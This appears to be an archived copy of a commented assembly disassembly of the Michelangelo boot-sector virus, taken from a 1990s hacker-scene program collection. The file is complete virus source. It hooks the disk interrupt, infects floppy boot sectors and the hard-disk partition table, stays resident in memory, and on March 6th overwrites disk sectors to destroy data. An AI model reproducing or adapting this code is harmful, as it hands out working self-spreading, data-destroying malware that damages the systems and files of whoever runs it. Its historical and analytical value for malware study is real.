home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / MICHELAN.ASM < prev    next >
Assembly Source File  |  1996-03-17  |  10KB  |  250 lines
  1. ; This is a disassembly of the much-hyped michelangelo virus.
  2. ; As you can see, it is a derivative of the Stoned virus.  The
  3. ; junk bytes at the end of the file are probably throwbacks to
  4. ; the Stoned virus.  In any case, it is yet another boot sector
  5. ; and partition table infector.
  6.  
  7. michelangelo    segment byte public
  8.                 assume  cs:michelangelo, ds:michelangelo
  9.                 org     0
  10.  
  11.                 jmp     entervirus
  12. highmemjmp      db      0F5h, 00h, 80h, 9Fh
  13. maxhead         db      2                       ; used by damagestuff
  14. firstsector     dw      3
  15. oldint13h       dd      0C8000256h
  16.  
  17. int13h:
  18.                 push    ds
  19.                 push    ax
  20.                 or      dl, dl                  ; default drive?
  21.                 jnz     exitint13h              ; exit if not
  22.                 xor     ax, ax
  23.                 mov     ds, ax
  24.                 test    byte ptr ds:[43fh], 1   ; disk 0 on?
  25.                 jnz     exitint13h              ; if not spinning, exit
  26.                 pop     ax
  27.                 pop     ds
  28.                 pushf
  29.                 call    dword ptr cs:[oldint13h]; first call old int 13h
  30.                 pushf
  31.                 call    infectdisk              ; then infect
  32.                 popf
  33.                 retf    2
  34. exitint13h:     pop     ax
  35.                 pop     ds
  36.                 jmp     dword ptr cs:[oldint13h]
  37.  
  38. infectdisk:
  39.                 push    ax
  40.                 push    bx
  41.                 push    cx
  42.                 push    dx
  43.                 push    ds
  44.                 push    es
  45.                 push    si
  46.                 push    di
  47.                 push    cs
  48.                 pop     ds
  49.                 push    cs
  50.                 pop     es
  51.                 mov     si, 4
  52. readbootblock:
  53.                 mov     ax,201h                 ; Read boot block to
  54.                 mov     bx,200h                 ; after virus
  55.                 mov     cx,1
  56.                 xor     dx,dx
  57.                 pushf
  58.                 call    oldint13h
  59.                 jnc     checkinfect             ; continue if no error
  60.                 xor     ax,ax
  61.                 pushf
  62.                 call    oldint13h               ; Reset disk
  63.                 dec     si                      ; loop back
  64.                 jnz     readbootblock
  65.                 jmp     short quitinfect        ; exit if too many 
  66. failures
  67. checkinfect:
  68.                 xor     si,si
  69.                 cld
  70.                 lodsw
  71.                 cmp     ax,[bx]                 ; check if already 
  72. infected
  73.                 jne     infectitnow
  74.                 lodsw
  75.                 cmp     ax,[bx+2]               ; check again
  76.                 je      quitinfect
  77. infectitnow:
  78.                 mov     ax,301h                 ; Write old boot block
  79.                 mov     dh,1                    ; to head 1
  80.                 mov     cl,3                    ; sector 3
  81.                 cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
  82.                 je      is360Kdisk
  83.                 mov     cl,0Eh
  84. is360Kdisk:
  85.                 mov     firstsector,cx
  86.                 pushf
  87.                 call    oldint13h
  88.                 jc      quitinfect              ; exit on error
  89.                 mov     si,200h+offset partitioninfo
  90.                 mov     di,offset partitioninfo
  91.                 mov     cx,21h                  ; Copy partition table
  92.                 cld
  93.                 rep     movsw
  94.                 mov     ax,301h                 ; Write virus to sector 
  95. 1
  96.                 xor     bx,bx
  97.                 mov     cx,1
  98.                 xor     dx,dx
  99.                 pushf
  100.                 call    oldint13h
  101. quitinfect:
  102.                 pop     di
  103.                 pop     si
  104.                 pop     es
  105.                 pop     ds
  106.                 pop     dx
  107.                 pop     cx
  108.                 pop     bx
  109.                 pop     ax
  110.                 retn
  111. entervirus:
  112.                 xor     ax,ax
  113.                 mov     ds,ax
  114.                 cli
  115.                 mov     ss,ax
  116.                 mov     ax,7C00h                ; Set stack to just 
  117. below
  118.                 mov     sp,ax                   ; virus load point
  119.                 sti
  120.                 push    ds                      ; save 0:7C00h on stack 
  121. for
  122.                 push    ax                      ; later retf
  123.                 mov     ax,ds:[13h*4]
  124.                 mov     word ptr ds:[7C00h+offset oldint13h],ax
  125.                 mov     ax,ds:[13h*4+2]
  126.                 mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  127.                 mov     ax,ds:[413h]            ; memory size in K
  128.                 dec     ax                      ; 1024 K
  129.                 dec     ax
  130.                 mov     ds:[413h],ax            ; move new value in
  131.                 mov     cl,6
  132.                 shl     ax,cl                   ; ax = paragraphs of 
  133. memory
  134.                 mov     es,ax                   ; next line sets seg of 
  135. jmp
  136.                 mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  137.                 mov     ax,offset int13h
  138.                 mov     ds:[13h*4],ax
  139.                 mov     ds:[13h*4+2],es
  140.                 mov     cx,offset partitioninfo
  141.                 mov     si,7C00h
  142.                 xor     di,di
  143.                 cld
  144.                 rep     movsb                   ; copy to high memory
  145.                                                 ; and transfer control 
  146. there
  147.                 jmp     dword ptr cs:[7C00h+offset highmemjmp]
  148. ; destination of highmem jmp
  149.                 xor     ax,ax
  150.                 mov     es,ax
  151.                 int     13h                     ; reset disk
  152.                 push    cs
  153.                 pop     ds
  154.                 mov     ax,201h
  155.                 mov     bx,7C00h
  156.                 mov     cx,firstsector
  157.                 cmp     cx,7                    ; hard disk infection?
  158.                 jne     floppyboot              ; if not, do floppies
  159.                 mov     dx,80h                  ; Read old partition 
  160. table of
  161.                 int     13h                     ; first hard disk to 
  162. 0:7C00h
  163.                 jmp     short exitvirus
  164. floppyboot:
  165.                 mov     cx,firstsector          ; read old boot block
  166.                 mov     dx,100h                 ; to 0:7C00h
  167.                 int     13h
  168.                 jc      exitvirus
  169.                 push    cs
  170.                 pop     es
  171.                 mov     ax,201h                 ; read boot block
  172.                 mov     bx,200h                 ; of first hard disk
  173.                 mov     cx,1
  174.                 mov     dx,80h
  175.                 int     13h
  176.                 jc      exitvirus
  177.                 xor     si,si
  178.                 cld
  179.                 lodsw
  180.                 cmp     ax,[bx]                 ; is it infected?
  181.                 jne     infectharddisk          ; if not, infect HD
  182.                 lodsw                           ; check infection
  183.                 cmp     ax,[bx+2]
  184.                 jne     infectharddisk
  185. exitvirus:
  186.                 xor     cx,cx                   ; Real time clock get 
  187. date
  188.                 mov     ah,4                    ; dx = mon/day
  189.                 int     1Ah
  190.                 cmp     dx,306h                 ; March 6th
  191.                 je      damagestuff
  192.                 retf                            ; return control to 
  193. original
  194.                                                 ; boot block @ 0:7C00h
  195. damagestuff:
  196.                 xor     dx,dx
  197.                 mov     cx,1
  198. smashanothersector:
  199.                 mov     ax,309h
  200.                 mov     si,firstsector
  201.                 cmp     si,3
  202.                 je      smashit
  203.                 mov     al,0Eh
  204.                 cmp     si,0Eh
  205.                 je      smashit
  206.                 mov     dl,80h                  ; first hard disk
  207.                 mov     maxhead,4
  208.                 mov     al,11h
  209. smashit:
  210.                 mov     bx,5000h                ; random memory area
  211.                 mov     es,bx                   ; at 5000h:5000h
  212.                 int     13h                     ; Write al sectors to 
  213. drive dl
  214.                 jnc     skiponerror             ; skip on error
  215.                 xor     ah,ah                   ; Reset disk drive dl
  216.                 int     13h
  217. skiponerror:
  218.                 inc     dh                      ; next head
  219.                 cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  220.                 jb      smashanothersector
  221.                 xor     dh,dh                   ; go to next 
  222. head/cylinder
  223.                 inc     ch
  224.                 jmp     short smashanothersector
  225. infectharddisk:
  226.                 mov     cx,7                    ; Write partition table 
  227. to
  228.                 mov     firstsector,cx          ; sector 7
  229.                 mov     ax,301h
  230.                 mov     dx,80h
  231.                 int     13h
  232.                 jc      exitvirus
  233.                 mov     si,200h+offset partitioninfo ; Copy partition
  234.                 mov     di,offset partitioninfo      ; table information
  235.                 mov     cx,21h
  236.                 rep     movsw
  237.                 mov     ax,301h                 ; Write to sector 8
  238.                 xor     bx,bx                   ; Copy virus to sector 1
  239.                 inc     cl
  240.                 int     13h
  241. ;*              jmp     short 01E0h
  242.                 db      0EBh, 32h               ; ?This should crash?
  243. ; The following bytes are meaningless.
  244. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  245. partitioninfo:  db      42h dup (0)
  246. michelangelo    ends
  247.                 end
  248.  
  249.  
  250.